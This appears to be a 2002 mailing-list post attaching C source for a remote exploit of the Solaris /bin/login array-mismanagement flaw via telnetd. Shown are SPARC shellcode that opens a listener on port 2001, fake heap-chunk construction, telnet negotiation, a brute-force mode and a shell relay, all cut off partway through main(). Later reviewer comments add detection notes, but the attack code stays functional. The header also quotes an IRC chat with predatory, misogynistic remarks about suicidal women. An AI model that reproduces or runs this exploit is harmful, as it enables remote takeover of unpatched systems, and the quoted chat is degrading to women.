

SOLARIS LOGIN remote via telnetd


Date: Thu, 14 Mar 2002 07:41:04 -0500
From: Morgan <[email protected]>
To: [email protected]
Subject: SOLARIS LOGIN remote via telnetd
Cc: [email protected]

--Boundary_(ID_54LyeLazkc1drFz5LNeQ7g)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT

Here's something I threw together for the Solaris login/telnetd remote...
patches have been out for a few months now.

--Boundary_(ID_54LyeLazkc1drFz5LNeQ7g)
Content-type: application/octet-stream; name=login-ex.c
Content-transfer-encoding: quoted-printable
Content-disposition: attachment; filename=login-ex.c

/*=0A=
Solaris /bin/login array mismanagement exploit by [email protected]=0A=
=0A=
compile: =0A=
	use -DSOLARIS if you're running it on a big-endian system....=0A=
=0A=
friendly advice to find that special someone:=0A=
[ronin([email protected])] think if i make 'the lonely hearts club' at =
college...=0A=
[ronin([email protected])] it'll have a psych. effect on chicks?=0A=
[msg(ronin)] you'd get all the suicidal chicks=0A=
[ronin([email protected])] they have like clubs and shit... chess =
clubs, sport, rollerblading, etc.=0A=
[ronin([email protected])] u can make ur own=0A=
[msg(ronin)] yah.. most schools do=0A=
[ronin([email protected])] they should be the best in bed=0A=
[ronin([email protected])] cuz of how vulnerable they are to suggestion=0A=
[ronin([email protected])] and all that angst=0A=
[msg(ronin)] always thinking=0A=
[ronin([email protected])] can be harnessed for sexual gratification=0A=
[msg(ronin)] your a quite a sexual trickster =0A=
[ronin([email protected])] plus=0A=
[ronin([email protected])] suicidal =3D pain=0A=
[ronin([email protected])] pain =3D bdsm=0A=
[ronin([email protected])] happy go lucky chicks are too content in bed=0A=
[msg(ronin)] /me wanders off slowly=0A=
[ronin([email protected])] but suicidal chicks like to cover the full =
spectrum of pain=0A=
[ronin([email protected])] and pain and pleasure are one=0A=
=0A=
greets:=0A=
matthew, pioneering the pinkhat movement... ryan&drago, reading telnet =
rfcs for me..=0A=
ron1n, OMG! You're in school now!@#$! The metaray, level 6 on everquest =
now!=0A=
blueboar, for his exquisite mailing list..=0A=
antisec for being so darn hackerifically ethical... keep up the faith=0A=
and arcanum the aim sexual predator...=0A=
*/=0A=
=0A=
#include <stdio.h>=0A=
#include <unistd.h>=0A=
#include <sys/socket.h>=0A=
#include <sys/types.h>=0A=
#include <string.h>=0A=
#include <errno.h>=0A=
#include <netinet/in.h>=0A=
#include <netdb.h>=0A=
#include <arpa/inet.h>=0A=
#include <arpa/telnet.h>=0A=
=0A=
#define NOPS 8=0A=
=0A=
/* Per-target address table, selected with -t (main() accepts indices 0..2
 * and copies reta/retl from the chosen row into its own variables).
 * A name containing "local" makes main() switch to the -e mode in which the
 * payload is printed instead of sent.  Only SunOS 5.7 layouts are listed;
 * nothing here adapts to other builds.  The NULL row terminates the table
 * for usage(). */
struct {=0A=
    /* label printed by usage(); NULL ends the table */
    char *name;=0A=
    /* "return address", the value usage() documents for -r */
    unsigned long reta;=0A=
    /* "return location", the value usage() documents for -l */
    unsigned long retl;=0A=
}targets[] =3D {=0A=
{ "SunOS 5.7... local", 0xffbef85c, 0x20026fc8},=0A=
{ "SunOS 5.7... remote", 0xffbef8bc, 0x20026fc8},=0A=
{ "SunOS 5,7... remote 2", 0xffbef824, 0x20026fc8},=0A=
=0A=
 { NULL, 0, 0 }=0A=
};=0A=
=0A=
/*
 * SPARC payload that setup_exploit() copies into the tail of its 512-byte
 * buffer (sizeof(shellcode) bytes, i.e. including the terminating NUL, which
 * setup_exploit() afterwards rewrites to a space).
 *
 * Reviewer notes (defensive reading of what is visible in this file):
 *  - the "mov 2001, %l6" word below matches remp = 2001 in main(), which
 *    connects to that port once the login exchange has finished; a new
 *    listener on TCP/2001 owned by a login process is therefore the
 *    post-exploitation artifact to look for on a host;
 *  - the padding written in front of this array is NOPS (8) copies of the
 *    4-byte nop[] sequence, i.e. 32 bytes — more than the "8 nop bytes" the
 *    trailing comment claims;
 *  - the third word is marked OVERWRITE by the author without saying what
 *    rewrites it; nothing in this file does.
 */
unsigned char   shellcode[] =3D   /* dopesquad.net shellcode + 8 nop =
bytes */=0A=
                "\x10\x80\x00\x03"      /* b            foolabel */=0A=
                "\x90\x1b\x80\x0e"      /* xor          %sp, %sp, %o0 */=0A=
/* OVERWRITE */ "\x82\x10\x20\x17"      /* mov          23, %g1 */=0A=
=0A=
=0A=
=0A=
  "\xa0\x23\xa0\x10"    /* sub          %sp, 16, %l0 */=0A=
  "\xae\x23\x80\x10"    /* sub          %sp, %l0, %l7 */=0A=
  "\xee\x23\xbf\xec"    /* st           %l7, [%sp - 20] */=0A=
  "\x82\x05\xe0\xd6"    /* add          %l7, 214, %g1 */=0A=
  "\x90\x25\xe0\x0e"    /* sub          %l7, 14, %o0 */=0A=
  "\x92\x25\xe0\x0e"    /* sub          %l7, 14, %o1 */=0A=
  "\x94\x1c\x40\x11"    /* xor          %l1, %l1, %o2 */=0A=
  "\x96\x1c\x40\x11"    /* xor          %l1, %l1, %o3 */=0A=
  "\x98\x25\xe0\x0f"    /* sub          %l7, 15, %o4 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\xa4\x1a\x80\x08"    /* xor          %o2, %o0, %l2 */=0A=
  "\xd2\x33\xbf\xf0"    /* sth          %o1, [%sp - 16] */=0A=
  "\xac\x10\x27\xd1"    /* mov          2001, %l6 */=0A=
  "\xec\x33\xbf\xf2"    /* sth          %l6, [%sp - 14] */=0A=
  "\xc0\x23\xbf\xf4"    /* st           %g0, [%sp - 12] */=0A=
  "\x82\x05\xe0\xd8"    /* add          %l7, 216, %g1 */=0A=
  "\x90\x1a\xc0\x12"    /* xor          %o3, %l2, %o0 */=0A=
  "\x92\x1a\xc0\x10"    /* xor          %o3, %l0, %o1 */=0A=
  "\x94\x1a\xc0\x17"    /* xor          %o3, %l7, %o2 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\x82\x05\xe0\xd9"    /* add          %l7, 217, %g1 */=0A=
  "\x90\x1a\xc0\x12"    /* xor          %o3, %l2, %o0 */=0A=
  "\x92\x25\xe0\x0b"    /* sub          %l7, 11, %o1 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\x82\x05\xe0\xda"    /* add          %l7, 218, %g1 */=0A=
  "\x90\x1a\xc0\x12"    /* xor          %o3, %l2, %o0 */=0A=
  "\x92\x1a\xc0\x10"    /* xor          %o3, %l0, %o1 */=0A=
  "\x94\x23\xa0\x14"    /* sub          %sp, 20, %o2 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\xa6\x1a\xc0\x08"    /* xor          %o3, %o0, %l3 */=0A=
  "\x82\x05\xe0\x2e"    /* add          %l7, 46, %g1 */=0A=
  "\x90\x1a\xc0\x13"    /* xor          %o3, %l3, %o0 */=0A=
  "\x92\x25\xe0\x07"    /* sub          %l7, 7, %o1 */=0A=
  "\x94\x1b\x80\x0e"    /* xor          %sp, %sp, %o2 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\x90\x1a\xc0\x13"    /* xor          %o3, %l3, %o0 */=0A=
  "\x92\x25\xe0\x07"    /* sub          %l7, 7, %o1 */=0A=
  "\x94\x02\xe0\x01"    /* add          %o3, 1, %o2 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\x90\x1a\xc0\x13"    /* xor          %o3, %l3, %o0 */=0A=
  "\x92\x25\xe0\x07"    /* sub          %l7, 7, %o1 */=0A=
  "\x94\x02\xe0\x02"    /* add          %o3, 2, %o2 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\x90\x1b\x80\x0e"    /* xor          %sp, %sp, %o0 */=0A=
  "\x82\x02\xe0\x17"    /* add          %o3, 23, %g1 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\x21\x0b\xd8\x9a"    /* sethi        %hi(0x2f626800), %l0 */=0A=
  "\xa0\x14\x21\x6e"    /* or           %l0, 0x16e, %l0 ! 0x2f62696e */=0A=
  "\x23\x0b\xdc\xda"    /* sethi        %hi(0x2f736800), %l1 */=0A=
  "\x90\x23\xa0\x10"    /* sub          %sp, 16, %o0 */=0A=
  "\x92\x23\xa0\x08"    /* sub          %sp, 8, %o1 */=0A=
  "\x94\x1b\x80\x0e"    /* xor          %sp, %sp, %o2 */=0A=
  "\xe0\x3b\xbf\xf0"    /* std          %l0, [%sp - 16] */=0A=
  "\xd0\x23\xbf\xf8"    /* st           %o0, [%sp - 8] */=0A=
  "\xc0\x23\xbf\xfc"    /* st           %g0, [%sp - 4] */=0A=
  "\x82\x02\xe0\x3b"    /* add          %o3, 59, %g1 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
  "\x90\x1b\x80\x0e"    /* xor          %sp, %sp, %o0 */=0A=
  "\x82\x02\xe0\x01"    /* add          %o3, 1, %g1 */=0A=
  "\x91\xd0\x38\x08"    /* ta           0x8 */=0A=
;=0A=
=0A=
=0A=
/* 4-byte filler word.  setup_exploit() copies sizeof(nop)-1 bytes of it
 * NOPS times directly in front of shellcode[], so the string's terminating
 * NUL is never part of the output. */
static char nop[]=3D"\x80\x1c\x40\x11";=0A=
=0A=
/*
 * Print the command-line help to stderr, list every row of targets[] with
 * its index, and terminate the process.
 *
 * argv: the program's argument vector; argv[0] is echoed into two of the
 *       usage lines.
 * Never returns: ends with exit(0), the same status the original used even
 * though this is the "wrong invocation" path.
 */
void usage(char **argv) {
        /* option lines that carry no format argument, in display order */
        static const char *const flag_help[] = {
                "\t-r <return address>\n",
                "\t-l <return location>\n",
                "\t-p <port>\n",
                "\t-t <target number>\n",
                "\t-e  [for local /bin/login execution mode check for +s]\n",
        };
        size_t k;
        int t;

        fputs("Solaris /bin/login array mismangement exploit by [email protected]\n", stderr);
        fprintf(stderr, "usage: %s <host>\n", argv[0]);
        for (k = 0; k < sizeof flag_help / sizeof flag_help[0]; k++)
                fputs(flag_help[k], stderr);
        fprintf(stderr, "\t%s -e <options> | /bin/login\n", argv[0]);
        fputs("\t-b brute force mode\n\n", stderr);

        fputs("targets are...\n", stderr);
        /* targets[] is terminated by a row whose name is NULL */
        for (t = 0; targets[t].name != NULL; t++)
                fprintf(stderr, "\t%d) %s\n", t, targets[t].name);

        fputc('\n', stderr);
        exit(0);
}
/*
 * Report a fatal error on stderr and terminate the process.
 *
 * error: message text placed after "Error: ".
 * Note: the exit status is 0 even though this is the failure path, so a
 * wrapper script cannot distinguish an abort from a normal run by status.
 * Never returns.
 */
void die(char *error) {
        /* one combined write; the bytes on stderr are unchanged */
        fprintf(stderr, "Error: %s\nProgram aborting..\n", error);
        exit(0);
}
        =0A=
/*
 * Reverse the byte order of *addr in place, treating it as a 32-bit value.
 *
 * addr: pointer to the value to swap; updated in place.
 *
 * The four terms are formed with shifts only, exactly as the original did:
 * (v << 8) >> 24 isolates one byte only when unsigned long is 32 bits wide.
 * On a 64-bit unsigned long the intermediate terms keep extra high bits and
 * the sum is no longer a byte swap — the callers in setup_exploit() then
 * copy the low 4 bytes of a wrong value.  Preserved as-is.
 */
void shift(unsigned long *addr) {
        unsigned long v = *addr;
        unsigned long byte_hi   = v >> 24;
        unsigned long byte_mid1 = ((v << 8) >> 24) << 8;
        unsigned long byte_mid2 = ((v << 16) >> 24) << 16;
        unsigned long byte_lo   = v << 24;

        *addr = byte_hi + byte_mid1 + byte_mid2 + byte_lo;
}
=0A=
/*
 * Write buff[0..s) to fd one byte at a time, sending every 0xFF byte twice
 * so the telnet peer takes it as a data octet rather than an IAC prefix.
 *
 * fd:   connected socket
 * buff: bytes to send
 * s:    number of bytes
 * Any failed write() aborts the process through die().
 * Declared int but never returns a value; main() ignores the result.
 * `pt` is declared but unused.
 */
int write_with_iac(int fd, char *buff, int s)=0A=
{=0A=
        int i;=0A=
        unsigned char c=3D0, pt;=0A=
        for (i=3D0; i<s; i++) {=0A=
                c=3D(unsigned char)buff[i];=0A=
                /* IAC (0xff) is escaped by doubling it */
                if (c=3D=3D0xff) if(write(fd, &c, 1) < 0)=0A=
     die("Write failed sending IAC");=0A=
                if(write(fd, &c, 1)<0)=0A=
     die("Write failed sending user string");=0A=
        }=0A=
}=0A=
=0A=
/*
 * Send one 3-byte telnet option reply: IAC, then WILL or WONT, then the
 * option code.
 *
 * fd:  connected socket
 * arg: TELOPT_* option code
 * a:   WILL or WONT; any other value prints a message and exit(0)s
 * The write() result is not checked, so a dropped connection is not
 * noticed here but only by a later read in main().
 */
void send_ww(int fd, unsigned char arg, int a) {=0A=
        char buf[3];=0A=
        char *p=3Dbuf;=0A=
=0A=
        *p++ =3D IAC;=0A=
        if(a =3D=3D WILL)=0A=
                *p++ =3D WILL;=0A=
        else if(a =3D=3D WONT)=0A=
                *p++ =3D WONT;=0A=
        else {=0A=
                fprintf(stderr, "illegal send, %d is not a valid send =
type\n", a);=0A=
                exit(0);=0A=
        }=0A=
        *p =3D arg;=0A=
=0A=
        /* unchecked: a short or failed write is silently ignored */
        write(fd, buf, 3);=0A=
=0A=
        return;=0A=
}=0A=
=0A=
=0A=
/*
 * Connect to host:port, send `commands`, then relay between stdin and the
 * socket until the peer closes, at which point the process exit()s.
 *
 * host: hostname or dotted address
 * port: TCP port (main() passes remp, 2001)
 * Returns -1 when the name cannot be resolved, the socket cannot be created
 * or the connect fails.  On success it never returns: the for(;;) loop has
 * no break and leaves only through exit(0), so `return sock` is dead code.
 *
 * Reviewer notes:
 *  - memcpy copies sizeof(h->h_addr) bytes, which is the size of a pointer
 *    (h_addr is conventionally h_addr_list[0], a char *), not the size of an
 *    IPv4 address; on an LP64 host that is 8 bytes into the 4-byte s_addr,
 *    spilling into sin_zero.  Correct only where pointers are 4 bytes;
 *  - the inet_addr() result is overwritten by the gethostbyname() copy, so
 *    numeric hosts also go through the resolver;
 *  - strerror(errno) does not describe resolver failures (those are
 *    reported via h_errno), so the "cannot resolve" message can mislead;
 *  - select() is called with a hard-coded nfds of 255; the stdin read()
 *    result is unchecked and strlen(buf) stops at the first NUL typed;
 *  - whatever the remote sends is printed raw to stderr, terminal escape
 *    sequences included;
 *  - `c` is unused.
 */
int connect_shell(char *host, int port)=0A=
{=0A=
        struct sockaddr_in s;=0A=
        int sock;=0A=
        struct hostent *h;=0A=
        unsigned char c;=0A=
        /* first bytes sent down the new connection; its output is what the
         * operator sees before the relay loop starts */
        char commands[] =3D "cd /; echo; uname -a; id ;echo; "=0A=
        "echo Mommy wow.. im a hacker now; echo ;\n\n";=0A=
        char buf[2048];=0A=
        fd_set fds;=0A=
        int r;=0A=
=0A=
        s.sin_family            =3D AF_INET;=0A=
        s.sin_port              =3D htons(port);=0A=
        s.sin_addr.s_addr       =3D inet_addr(host);=0A=
=0A=
        if ((h=3Dgethostbyname(host)) =3D=3D NULL)=0A=
        {=0A=
                fprintf(stderr, "cannot resolve: %s : %s\n", host, =
strerror(errno));=0A=
                return -1;=0A=
        }=0A=
        /* sizeof(h->h_addr) is sizeof(char *), see header note */
        memcpy (&s.sin_addr.s_addr, (struct in_addr *)h->h_addr, =
sizeof(h->h_addr));=0A=
        =0A=
        if ( (sock =3D socket (AF_INET, SOCK_STREAM, 0)) =3D=3D -1)=0A=
                return sock;=0A=
        =0A=
        if (connect (sock, (struct sockaddr *)&s, sizeof(s)) =3D=3D -1)=0A=
        {=0A=
                close (sock);=0A=
                return -1;=0A=
        }=0A=
=0A=
        /* unchecked write */
        write(sock, commands, strlen(commands));=0A=
=0A=
        /* relay loop: exits the process on EOF from the socket */
        for(;;)=0A=
        {   =0A=
                FD_ZERO(&fds);=0A=
                FD_SET(fileno(stdin), &fds);=0A=
                FD_SET(sock, &fds);=0A=
                /* nfds should be max(fd)+1, not a constant */
                select(255, &fds, NULL, NULL, NULL);=0A=
=0A=
                if(FD_ISSET(sock, &fds))=0A=
                {   =0A=
                        memset(buf, 0x0, sizeof(buf));=0A=
                        r =3D read (sock, buf, sizeof(buf) - 1);=0A=
                        if(r <=3D 0)=0A=
                        {   =0A=
                            fprintf(stderr, "Connection closed.\n");=0A=
                            exit(0);=0A=
                        }=0A=
                        fprintf(stderr, "%s", buf);=0A=
                }=0A=
=0A=
                if(FD_ISSET(fileno(stdin), &fds))=0A=
                {   =0A=
                    memset(buf, 0x0, sizeof(buf));=0A=
                    /* read() result ignored; an EOF on stdin busy-loops here */
                    read(fileno(stdin), buf, sizeof(buf) - 1);=0A=
                    write(sock, buf, strlen(buf));=0A=
                }=0A=
        }=0A=
        /* unreachable */
        return sock;=0A=
}=0A=
/*
 * Open the telnet connection to host:port and answer the option
 * negotiation: WONT for TTYPE, NAWS, XDISPLOC, NEW_ENVIRON and OLD_ENVIRON,
 * WILL for BINARY.  Nothing is read back here; the server's own requests
 * are consumed later by the prompt scanning in main().
 *
 * host: hostname or dotted address
 * port: TCP port (23 unless -p)
 * Returns the connected descriptor, or -1 on resolve/socket/connect
 * failure.  main() does not check for -1.
 *
 * Reviewer notes (same as connect_shell):
 *  - memcpy copies sizeof(h->h_addr) bytes, the size of a pointer, not of
 *    an IPv4 address — 8 bytes into the 4-byte s_addr on an LP64 host;
 *  - the inet_addr() result is overwritten by the gethostbyname() copy;
 *  - strerror(errno) does not describe resolver errors (h_errno does);
 *  - `ret`, `c` and `buf` are unused.
 */
int do_telnet_negotation(char *host, int port)=0A=
{=0A=
        struct sockaddr_in s;=0A=
        int fd, ret;=0A=
        u_char c, buf[3];=0A=
        struct hostent *h;=0A=
        =0A=
        s.sin_family            =3D AF_INET;=0A=
        s.sin_port              =3D htons(port);=0A=
        s.sin_addr.s_addr       =3D inet_addr(host);=0A=
=0A=
        if ((h=3Dgethostbyname(host)) =3D=3D NULL)=0A=
        {=0A=
                fprintf(stderr, "cannot resolve: %s : %s\n", host, =
strerror(errno));=0A=
                return -1;=0A=
        }=0A=
                =0A=
        /* sizeof(h->h_addr) is sizeof(char *), see header note */
        memcpy (&s.sin_addr.s_addr, (struct in_addr *)h->h_addr, =
sizeof(h->h_addr));=0A=
                =0A=
        if ( (fd =3D socket (AF_INET, SOCK_STREAM, 0)) =3D=3D -1)=0A=
                return fd;=0A=
                =0A=
        if (connect (fd, (struct sockaddr *)&s, sizeof(s)) =3D=3D -1)=0A=
        {=0A=
                close (fd);=0A=
                return -1;=0A=
        }=0A=
        =0A=
        // decline the options a telnet server usually asks for (WONT), and offer BINARY=0A=
        send_ww(fd, TELOPT_TTYPE, WONT);=0A=
        send_ww(fd, TELOPT_NAWS, WONT);=0A=
        send_ww(fd, TELOPT_XDISPLOC, WONT);=0A=
        send_ww(fd, TELOPT_NEW_ENVIRON, WONT);=0A=
        send_ww(fd, TELOPT_OLD_ENVIRON, WONT);=0A=
        send_ww(fd, TELOPT_BINARY, WILL);=0A=
        =0A=
        return fd;=0A=
}=0A=
=0A=
/*
 * Build the oversized "login name" that main() sends at the login: prompt.
 *
 * buffer: destination; main() passes out[1024]
 * retl:   return location (-l / targets[].retl); 32 is subtracted first
 * reta:   return address (-r / targets[].reta); 8 is subtracted first
 * bf:     non-zero in brute-force mode (changes only the progress message)
 *
 * What is written, as far as this function shows it:
 *   blah[0..255]  0x41 filler, with every other byte in 63..190 a space,
 *                 two 4-byte addresses at +204 and +252, NUL at [256];
 *   buf[0..510]   0x41 filler carrying the hand-built values at offsets
 *                 0/4/8/16/32 and 36, then NOPS*4 bytes of nop[] followed by
 *                 shellcode[] ending at index 508; any NUL inside 0..510 is
 *                 replaced by a space so the whole thing survives as a C
 *                 string; buf[511] terminates it.
 * The two strings are concatenated into `buffer` with a trailing "\n":
 * at most 256 + 511 + 1 bytes plus NUL, which fits out[1024].
 *
 * Detection note: a username field of this length, made almost entirely of
 * 'A' bytes interleaved with spaces, does not occur in legitimate telnet
 * logins — length alone is a reliable signal at the network edge.
 *
 * Reviewer notes:
 *  - the #ifndef SOLARIS blocks byte-swap the fixed 32-bit values for a
 *    little-endian build host (the header comment's -DSOLARIS means
 *    "big-endian host"); shift() itself assumes a 32-bit unsigned long;
 *  - "%#x" is given an unsigned long — a format/argument mismatch wherever
 *    unsigned long is wider than unsigned int;
 *  - the hard-coded addresses apply to SunOS 5.7 only (see targets[]);
 *  - declared int but ends with a bare `return;`; `j` counts replaced NULs
 *    and is never read; `a` is unused; only 512 of buf[3000] are touched.
 */
int setup_exploit(char *buffer, unsigned long retl, unsigned long reta, =
int bf) {=0A=
        int i,j;=0A=
        char *ptr;=0A=
        char buf[3000]; =0A=
        char blah[512];=0A=
        unsigned long *a;=0A=
        unsigned long strncpy_addr =3D 0xffbef2a8;  =0A=
        unsigned long chunk_size =3D 0xffffffd5;=0A=
        unsigned long chunk =3D 0xfffffff0;   =0A=
        unsigned long free_addr =3D 0x20026eec;=0A=
#ifndef SOLARIS=0A=
        /* build-host byte order, not the target's: swap on little-endian hosts */
        shift(&strncpy_addr);=0A=
        shift(&chunk_size);=0A=
        shift(&chunk);=0A=
        shift(&free_addr);=0A=
#endif           =0A=
	fprintf(stderr, "Solaris /bin/login array mismangement exploit by =
[email protected]\n");=0A=
	fprintf(stderr, "<matthew> I've brought more terror to this network =
then Shdwknght to a chinese food buffet.\n\n");=0A=
	/* %#x with an unsigned long argument: mismatched on LP64 */
	if(!bf) {=0A=
		fprintf(stderr, "using %#x as return address\n", reta);=0A=
		fprintf(stderr, "using %#x as return location\n", retl);=0A=
	}=0A=
	else fprintf(stderr, "trying return address %#x\n", reta);=0A=
=0A=
        memset(&buf[0], 0x41, 512);=0A=
        // SETUP FIRST CHUNK=0A=
        // size -44+1=0A=
        ptr =3D &buf[36];=0A=
	memcpy(ptr, &chunk_size, 4); =0A=
=0A=
        // SETUP CHUNK numbah 2=0A=
        retl -=3D 32;=0A=
        reta -=3D 8;=0A=
#ifndef SOLARIS=0A=
	shift(&retl);=0A=
	shift(&reta);=0A=
#endif=0A=
        ptr =3D buf;=0A=
=0A=
	memcpy(ptr, &chunk, 4);=0A=
        // second addr free'd =0A=
	memcpy(ptr+4, &free_addr, 4);=0A=
        memcpy(ptr+8, (void *)&retl, 4);=0A=
        memset(ptr+16, 0xff, 4);=0A=
        memcpy(ptr+32, (void *) &reta, 4);=0A=
=0A=
        // fake chunk built.. setting up overflow..=0A=
        /* indices 0..62 and 191..255 get 0x41; 63..190 alternate 0x20/0x41 */
        for(i=3D0; i < 256; i++) {=0A=
            if( i < 63 || i > 190) =0A=
                blah[i] =3D 0x41;=0A=
            else  {=0A=
                blah[i++] =3D 0x20;=0A=
                blah[i] =3D 0x41;=0A=
            }=0A=
        }=0A=
=0A=
        //free addr 1 send in addr of mem=0A=
	memcpy(blah+252, &free_addr, 4);=0A=
=0A=
	memcpy(blah+204, &strncpy_addr, 4);=0A=
=0A=
        blah[256] =3D 0x00;=0A=
=0A=
=0A=
        // add shellcode to end of buf=0A=
        // pad with nops.. more is better... but not too many..=0A=
        /* NOPS copies of the 4-byte nop word (sizeof(nop)-1 drops its NUL);
         * sizeof() makes the bounds size_t, so i is compared as unsigned */
        for(i=3D511-sizeof(shellcode)-2-4*NOPS; i < =
511-sizeof(shellcode); i+=3D4) =0A=
                memcpy(&buf[i], nop, sizeof(nop)-1);=0A=
        /* copies the terminating NUL too (index 508); fixed up below */
        memcpy(&buf[511-sizeof(shellcode)-2], shellcode, =
sizeof(shellcode));=0A=
=0A=
=0A=
        // convert nulls to space..=0A=
        /* j is incremented but never read */
        for(i=3D0,j=3D0;i<511;i++) {=0A=
                if(buf[i] =3D=3D 0x00) {=0A=
                        buf[i] =3D 0x20; j++; }=0A=
        }=0A=
        buf[511] =3D 0x00;=0A=
=0A=
        /* &blah/&buf are array pointers with the same address as blah/buf;
         * output is 256 + 511 + 1 bytes plus NUL */
        sprintf(buffer,"%s%s\n", &blah,&buf);=0A=
=0A=
        /* bare return in an int function; the result is never used */
        return;=0A=
}=0A=
=0A=
/*
 * Entry point.
 *
 * Parses -r/-l/-p/-e/-t/-b, builds the payload with setup_exploit(), then:
 *  - in -e ("local") mode prints the payload to stdout so the caller can
 *    pipe it into /bin/login;
 *  - otherwise drives a telnet session: connect and negotiate options
 *    (do_telnet_negotation), wait for a ':' in the server text, send the
 *    payload with write_with_iac(), wait for the next ':' (Password:),
 *    send a newline, wait for "correct" (Login incorrect), then connect to
 *    port remp (2001) with connect_shell().
 * With -b the remote sequence repeats for reta = 0xffbef800 upward in steps
 * of 4; without -b the loop body runs once and returns.
 *
 * On-the-wire sequence a defender can look for: telnet option negotiation,
 * a ~768-byte username at the login: prompt, an empty password, a "Login
 * incorrect" reply, then a fresh TCP connection to port 2001 on the same
 * host.
 *
 * Reviewer notes:
 *  - fd from do_telnet_negotation() is used without checking for -1;
 *  - read() returning 0 (peer closed) is not treated as an error in the
 *    three scan loops, so a closed connection spins forever there;
 *  - connect_shell() returns only on failure (-1); on success it exit()s
 *    inside its relay loop, so close(fd) and everything after it are never
 *    reached in the success case;
 *  - a -r value at or above 0xffbef8ff skips the for loop entirely and only
 *    prints "connection closed.";
 *  - port from -p is not range-checked; `type` is uninitialized but only
 *    read inside case 't' after being set;
 *  - bare `return;` in int main; fd2, bshell, cc and login are unused.
 */
int main(int argc, char **argv) {=0A=
        /* fd2 is never used */
        int fd,fd2, c, type, port=3D23,local=3D0,bf=3D0, remp=3D2001;=0A=
        /* payload buffer filled by setup_exploit() */
        char out[1024];=0A=
        /* small receive window for prompt scanning; reads fill at most 22 bytes
         * so the last two bytes stay NUL */
        char in[24];=0A=
        char ret[] =3D "\x0a";=0A=
        /* only set in remote mode; unused (and uninitialized) under -e */
        char *host;=0A=
	unsigned char bshell =3D 0xd5;=0A=
        char cc;=0A=
        unsigned long reta, retl;=0A=
=0A=
=0A=
        FILE *login;=0A=
=0A=
        /* defaults; targets[] rows or -r/-l override them */
        retl =3D 0x20026fc8;=0A=
        reta =3D  0xffbef864;=0A=
        if(argc < 2)=0A=
                usage(argv);=0A=
         =0A=
        while((c =3D getopt(argc, argv, "r:l:p:et:b")) !=3D EOF){=0A=
                switch(c){     =0A=
                case 'r':=0A=
                    reta =3D strtoul(optarg, NULL, 0);=0A=
                    break;=0A=
                case 'l':=0A=
                    retl =3D strtoul(optarg, NULL, 0);    =0A=
                    break;=0A=
                case 'p':=0A=
                    /* not range-checked */
                    port =3D atoi(optarg);=0A=
                    break;=0A=
                case 'e':=0A=
                    local=3D1;=0A=
                    break;=0A=
                case 't':=0A=
                    type =3D atoi(optarg);=0A=
                    /* bound matches the three rows of targets[] */
                    if(type < 0 || type > 2){ =0A=
                        fprintf(stderr, "invalid target\n");=0A=
                        usage(argv);=0A=
			/* unreachable: usage() already exit()s */
			exit(0);=0A=
                    }=0A=
                    /* a "local" target implies -e */
                    if(strstr(targets[type].name, "local")) =0A=
                        local =3D 1;=0A=
                    retl =3D targets[type].retl;=0A=
                    reta =3D targets[type].reta;=0A=
                    break;=0A=
		case 'b':=0A=
		    bf=3D1;=0A=
		    break;=0A=
                }=0A=
        }=0A=
=0A=
        if(!local) {=0A=
                if(!argv[optind] || !*argv[optind])=0A=
                        usage(argv);=0A=
=0A=
                host =3D argv[optind];=0A=
        }=0A=
	=0A=
        if(local) {=0A=
                fprintf(stderr, "Local execution mode.. make sure to run =
%s [args] | /bin/login\n", argv[0]);=0A=
                fprintf(stderr, "first wait for Password: prompt.. hit =
enter then,");=0A=
                fprintf(stderr, "wait for Login incorrect, and attempt =
to connect to localhost on %d\n", remp);=0A=
=0A=
        }=0A=
	if(bf) {=0A=
		 reta =3D 0xffbef800;=0A=
	}		=0A=
=0A=
=0A=
	/* single pass unless -b; skipped entirely when reta >= 0xffbef8ff */
	for(;reta < 0xffbef8ff; reta+=3D4) {=0A=
		memset(out, 0, sizeof(out));=0A=
	        setup_exploit(out, retl, reta, bf);=0A=
=0A=
	        if(local) {=0A=
			if(bf) {=0A=
				fprintf(stderr, "not supported do it manually you lazy fuck\n");=0A=
				exit(0);=0A=
			}=0A=
	                printf("%s", out);=0A=
       	 	}=0A=
        	else {=0A=
			char *ptr=3Din;=0A=
			/* -1 on failure is not checked; the reads below would then fail */
                	fd =3D do_telnet_negotation (host, port);=0A=
=0A=
                	memset(in, 0, sizeof(in));=0A=
=0A=
			/* scan loop: walk ptr to the next NUL in `in`; when the end of the
			 * window (or a double NUL) is reached, refill `in` from the socket.
			 * read() == 0 is not handled, so EOF spins here. */
                	while (!strstr(ptr, ":")) {=0A=
				 if(ptr=3D=3D&in[0]) {=0A=
					 memset(in, 0, sizeof(in));=0A=
	                	         if(read(fd, in, sizeof(in)-2) < 0)=0A=
      						die("Failed read waiting for login: ");=0A=
				 }=0A=
				 for(;ptr < &in[sizeof(in)-1] && ptr[0] !=3D 0; ptr++);=0A=
				 if( ptr=3D=3D&in[sizeof(in)-2] || (ptr[0]=3D=3D0 && ptr[1]=3D=3D0)) =0A=
				     ptr =3D &in[0];=0A=
				 else =0A=
				     ptr++;=0A=
=0A=
                	}=0A=
			memset(in, 0, sizeof(in));=0A=
			fprintf(stdout, "Read login, sending bad user string now\n");=0A=
                	write_with_iac(fd, out, strlen(out));=0A=
                        fprintf(stdout, "waiting for password... ");=0A=
=0A=
                       /* same scan as above, for the next ':' (Password:) */
                       while (!strstr(ptr, ":")) {=0A=
                                 if(ptr=3D=3D&in[0]) {=0A=
                                         memset(in, 0, sizeof(in));=0A=
                                         if(read(fd, in, sizeof(in)-2) < =
0)=0A=
                                                die("Failed read waiting =
for password: ");=0A=
                                 }=0A=
                                 for(;ptr < &in[sizeof(in)-1] && ptr[0] =
!=3D 0; ptr++);=0A=
                                 if( ptr=3D=3D&in[sizeof(in)-2] || =
(ptr[0]=3D=3D0 && ptr[1]=3D=3D0))  ptr =3D &in[0];=0A=
                                 else ptr++;=0A=
                        }        =0A=
